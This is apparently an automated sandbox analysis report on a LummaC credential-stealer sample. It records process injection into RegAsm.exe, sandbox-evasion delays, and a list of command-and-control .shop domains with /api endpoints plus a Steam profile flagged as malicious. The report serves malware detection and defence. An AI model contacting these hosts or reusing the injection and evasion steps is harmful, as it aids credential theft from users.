    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00438C003_2_00438C00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0043FD0E3_2_0043FD0E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00449E603_2_00449E60
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00407E703_2_00407E70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00447EDE3_2_00447EDE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042DEF83_2_0042DEF8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0043EF503_2_0043EF50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040AFD03_2_0040AFD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042DFE03_2_0042DFE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040BF803_2_0040BF80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00448F803_2_00448F80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040CAD0 appears 53 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040ED80 appears 194 times
    Source: 3ZD5tEC5DH.exe, 00000000.00000002.2135373419.000000000095E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3ZD5tEC5DH.exe
    Source: 3ZD5tEC5DH.exe, 00000000.00000000.2117110100.000000000023E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVQP.exe< vs 3ZD5tEC5DH.exe
    Source: 3ZD5tEC5DH.exeBinary or memory string: OriginalFilenameVQP.exe< vs 3ZD5tEC5DH.exe
    Source: 3ZD5tEC5DH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 3ZD5tEC5DH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@4/2@11/7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004381AA CoCreateInstance,3_2_004381AA
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3ZD5tEC5DH.exe.logJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:972:120:WilError_03
    Source: 3ZD5tEC5DH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: 3ZD5tEC5DH.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 3ZD5tEC5DH.exeReversingLabs: Detection: 47%
    Source: unknownProcess created: C:\Users\user\Desktop\3ZD5tEC5DH.exe "C:\Users\user\Desktop\3ZD5tEC5DH.exe"
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: 3ZD5tEC5DH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: 3ZD5tEC5DH.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: 3ZD5tEC5DH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0045535E push edx; retf 3_2_0045535F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00437333 push 04EC839Eh; mov dword ptr [esp], edi3_2_0043733A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004533F4 push edi; ret 3_2_004533F5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00453400 push edi; ret 3_2_00453401
    Source: 3ZD5tEC5DH.exeStatic PE information: section name: .text entropy: 7.995705798028068
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeMemory allocated: BC0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeMemory allocated: 23E0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exe TID: 6092Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2404Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn!5
    Source: RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2239609640.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00447560 LdrInitializeThunk,3_2_00447560
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Allocates memory in foreign processes
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
    Contains functionality to inject code into remote processes
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeCode function: 0_2_026A2151 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_026A2151
    Injects a PE file into a foreign processes
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
    LummaC encrypted strings found
    Source: 3ZD5tEC5DH.exe, 00000000.00000002.2136578260.00000000036A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: reinforcenh.shop
    Source: 3ZD5tEC5DH.exe, 00000000.00000002.2136578260.00000000036A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stogeneratmns.shop
    Source: 3ZD5tEC5DH.exe, 00000000.00000002.2136578260.00000000036A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fragnantbui.shop
    Source: 3ZD5tEC5DH.exe, 00000000.00000002.2136578260.00000000036A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: drawzhotdog.shop
    Source: 3ZD5tEC5DH.exe, 00000000.00000002.2136578260.00000000036A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: vozmeatillu.shop
    Source: 3ZD5tEC5DH.exe, 00000000.00000002.2136578260.00000000036A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: offensivedzvju.shop
    Source: 3ZD5tEC5DH.exe, 00000000.00000002.2136578260.00000000036A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ghostreedmnu.shop
    Source: 3ZD5tEC5DH.exe, 00000000.00000002.2136578260.00000000036A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: gutterydhowi.shop
    Source: 3ZD5tEC5DH.exe, 00000000.00000002.2136578260.00000000036A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: lootebarrkeyn.shop
    Writes to foreign memory regions
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000Jump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000Jump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A31008Jump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\3ZD5tEC5DH.exeQueries volume information: C:\Users\user\Desktop\3ZD5tEC5DH.exe VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    PowerShell    		1
    DLL Side-Loading    		411
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Disable or Modify Tools    		LSASS Memory31
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol2
    Clipboard Data    		1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
    Virtualization/Sandbox Evasion    		Security Account Manager12
    System Information Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
    Process Injection    		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Deobfuscate/Decode Files or Information    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
    Obfuscated Files or Information    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
    Software Packing    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    3ZD5tEC5DH.exe47%ReversingLabsByteCode-MSIL.Trojan.Zilla

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l0%Avira URL Cloudsafe
    lootebarrkeyn.shop100%Avira URL Cloudmalware
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=gC0%Avira URL Cloudsafe
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff0%Avira URL Cloudsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTS0%Avira URL Cloudsafe
    https://drawzhotdog.shop/api100%Avira URL Cloudmalware
    stogeneratmns.shop100%Avira URL Cloudmalware
    https://gutterydhowi.shop/api100%Avira URL Cloudmalware
    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&amp;l=e0%Avira URL Cloudsafe
    reinforcenh.shop100%Avira URL Cloudmalware
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
    https://steamcommunity.com/N0%Avira URL Cloudsafe
    https://performenj.shop/6&100%Avira URL Cloudmalware
    https://offensivedzvju.shop/100%Avira URL Cloudmalware
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.c0%Avira URL Cloudsafe
    https://reinforcenh.shop/d&100%Avira URL Cloudmalware
    https://reinforcenh.shop/api100%Avira URL Cloudmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%Avira URL Cloudsafe
    https://stogeneratmns.shop/&-7100%Avira URL Cloudmalware
    https://vozmeatillu.shop/100%Avira URL Cloudmalware
    https://offensivedzvju.shop/W100%Avira URL Cloudmalware
    https://drawzhotdog.shop/100%Avira URL Cloudmalware
    ghostreedmnu.shop100%Avira URL Cloudmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310%Avira URL Cloudsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%Avira URL Cloudsafe
    https://ghostreedmnu.shop/100%Avira URL Cloudmalware
    https://performenj.shop/pi100%Avira URL Cloudmalware
    https://gutterydhowi.shop/apiO100%Avira URL Cloudmalware
    https://community.akamaoE0%Avira URL Cloudsafe
    https://performenj.shop/100%Avira URL Cloudmalware
    https://stogeneratmns.shop/api100%Avira URL Cloudmalware
    https://vozmeatillu.shop/api100%Avira URL Cloudmalware
    gutterydhowi.shop100%Avira URL Cloudmalware
    https://ghostreedmnu.shop/api100%Avira URL Cloudmalware
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%Avira URL Cloudsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%Avira URL Cloudsafe
    https://offensivedzvju.shop/api100%Avira URL Cloudmalware
    fragnantbui.shop100%Avira URL Cloudmalware
    offensivedzvju.shop100%Avira URL Cloudmalware
    https://fragnantbui.shop/api100%Avira URL Cloudmalware
    drawzhotdog.shop100%Avira URL Cloudmalware
    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg0%Avira URL Cloudsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%Avira URL Cloudsafe
    https://performenj.shop/apit100%Avira URL Cloudmalware
    https://performenj.shop/api100%Avira URL Cloudmalware
    https://stogeneratmns.shop/apiJ100%Avira URL Cloudmalware
    https://steamcommunity.com/0%Avira URL Cloudsafe
    vozmeatillu.shop100%Avira URL Cloudmalware
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    fragnantbui.shop
    		188.114.96.3
    		truetrue
      		unknown
      performenj.shop
      		172.67.189.2
      		truetrue
        		unknown
        gutterydhowi.shop
        		104.21.4.136
        		truetrue
          		unknown
          steamcommunity.com
          		104.102.49.254
          		truefalse
            		unknown
            offensivedzvju.shop
            		188.114.96.3
            		truetrue
              		unknown
              stogeneratmns.shop
              		188.114.96.3
              		truetrue
                		unknown
                reinforcenh.shop
                		172.67.208.139
                		truetrue
                  		unknown
                  drawzhotdog.shop
                  		172.67.162.108
                  		truetrue
                    		unknown
                    ghostreedmnu.shop
                    		188.114.97.3
                    		truetrue
                      		unknown
                      vozmeatillu.shop
                      		188.114.96.3
                      		truetrue
                        		unknown
                        fp2e7a.wpc.phicdn.net
                        		192.229.221.95
                        		truefalse
                          		unknown
                          lootebarrkeyn.shop
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://drawzhotdog.shop/apitrue
                            • Avira URL Cloud: malware
                            		unknown
                            lootebarrkeyn.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://gutterydhowi.shop/apitrue
                            • Avira URL Cloud: malware
                            		unknown
                            stogeneratmns.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            reinforcenh.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://reinforcenh.shop/apitrue
                            • Avira URL Cloud: malware
                            		unknown
                            ghostreedmnu.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://steamcommunity.com/profiles/76561199724331900true
                            • URL Reputation: malware
                            		unknown
                            https://vozmeatillu.shop/apitrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://stogeneratmns.shop/apitrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://ghostreedmnu.shop/apitrue
                            • Avira URL Cloud: malware
                            		unknown
                            fragnantbui.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            gutterydhowi.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://offensivedzvju.shop/apitrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://fragnantbui.shop/apitrue
                            • Avira URL Cloud: malware
                            		unknown
                            offensivedzvju.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            drawzhotdog.shoptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://performenj.shop/apitrue
                            • Avira URL Cloud: malware
                            		unknown
                            vozmeatillu.shoptrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
